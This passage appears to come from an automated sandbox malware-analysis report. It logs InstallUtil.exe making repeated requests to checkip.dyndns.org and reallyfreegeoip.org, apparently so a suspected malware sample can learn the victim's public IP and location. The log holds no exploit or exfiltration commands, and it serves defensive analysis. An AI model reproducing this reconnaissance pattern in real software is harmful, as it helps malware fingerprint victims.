                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.449874132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:15.167418003 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:15.970668077 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:15 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.449886132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:16.611049891 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:17.398276091 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:17 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.449897132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:18.107815027 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:18.891547918 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:18 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.449908132.226.8.169807492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 8, 2025 16:33:19.541558027 CET151OUTGET / HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 8, 2025 16:33:20.356795073 CET273INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:20 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 104
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449827188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:09 UTC855INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:09 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665178
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7EIb4cbg2bM%2F31B118lHKg3GJL2B2xXQER0NBjxmbIEEUrIc18GS1j7vryseq5Xp%2Bn0dUIjJqCmJXSxLyPpQSUXtZ2EqWLhw9o2eJCeWXX5jH%2FaEymA0YpAn7hlKSGXuHWjNSpY3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3e8f9b0a41d2-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1723&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1679125&cwnd=251&unsent_bytes=0&cid=ce734b2f31bb2df8&ts=355&x=0"
                                                                                                                                                              2025-01-08 15:33:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.449836188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2025-01-08 15:33:10 UTC861INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:10 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665179
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYbEkcCZNSEgKuS2gtys8owUPGMDVNvJl34dGiq%2F%2BA%2Bjs1nep1Ts6P0YgQ7JJPgcq0dkEgDE03B8l1qC9SKA2Sn9YVHpkQRlC%2FtKIqeZPZGxAYZ%2B1xAKfMBGLAXoB%2F6F6eLo4Zsr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3e955c90425b-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1847&rtt_var=713&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1513737&cwnd=239&unsent_bytes=0&cid=f3a62cbefec11763&ts=165&x=0"
                                                                                                                                                              2025-01-08 15:33:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.449847188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:12 UTC853INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:12 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665181
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UO8EF2jTsVaXtFtd%2FtloeoUdTPmGGONLR5G0oSobHSdWCbUir94fpzd1oLLjszMPYCzaZSjqLS8g7otBhipKq25bEz7FK4no3M2CtPRAnTrqxC6VcWONqPaBQKUulbGgi%2BOWb1pY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3e9f0a1b8c89-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4477&min_rtt=4477&rtt_var=2238&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=229127&cwnd=202&unsent_bytes=0&cid=ff588b59f5c283a9&ts=286&x=0"
                                                                                                                                                              2025-01-08 15:33:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.449859188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:13 UTC853INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:13 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665182
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efUngWJ2dmWPqXs1iFuypKv%2B8FclekobcXtdj78WNN7vM7QDNBveUkxVfg6vHSCE4FPAwcxye3zrZfYamiz6VfXwWlHr3ykS3bF7RNvzHrHHq0OkzcHHSE%2BXPjzctcIiI7ANC7k3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3ea7ef818ccd-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2019&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1429270&cwnd=195&unsent_bytes=0&cid=5741addbea62c57b&ts=133&x=0"
                                                                                                                                                              2025-01-08 15:33:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.449869188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2025-01-08 15:33:15 UTC857INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:15 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665184
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xseOc%2BExu9VWlIqNC4BkfhVRBxxKayZRsv6WpPR1LuyA6ntkw5kUoucgigX%2BWrSkU3YyUJ6P4MvRLCoAu4cPWVvnQ1N1nH6umwgRK6W%2F9Kc3agb41XteLtjQsC4NtbqbxhpDAnlr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3eb15ebe43fb-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=13019&min_rtt=1806&rtt_var=7482&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1616832&cwnd=180&unsent_bytes=0&cid=5fa79eb059748c88&ts=159&x=0"
                                                                                                                                                              2025-01-08 15:33:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.449880188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:16 UTC853INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:16 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665185
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISkDnimC6B%2F7CfJvNOCakNAXEwZpA1hmprMU0DfVCCjt28HQaB9ZFbvbz0oMzSDUsDMzEPz6cU38KVLw9872L140%2FZmJRaHO86wvh7B6LnbvY7eWWEmwI0tmTSchFlAvTk4wXVZH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3eba4b0d7d1c-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1969&rtt_var=839&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1229991&cwnd=157&unsent_bytes=0&cid=e888079326a94462&ts=161&x=0"
                                                                                                                                                              2025-01-08 15:33:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.449892188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:17 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              2025-01-08 15:33:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:18 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665187
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29cbVUb5FOia0zH9JLmNC9ZME5xr60Hedv%2BWKtTHg%2BfC8aiqYUimNzI0wRwHfyRPBlaf3WyrGi1OF4RjEiC0pOS6WfdFVl1odZFsEKcV3uiURzHrBYFpoLXZTPSptO%2FSmx0bm0cs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3ec39b13f5f4-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=108052&cwnd=103&unsent_bytes=0&cid=a1b1aa9c987ce2a6&ts=185&x=0"
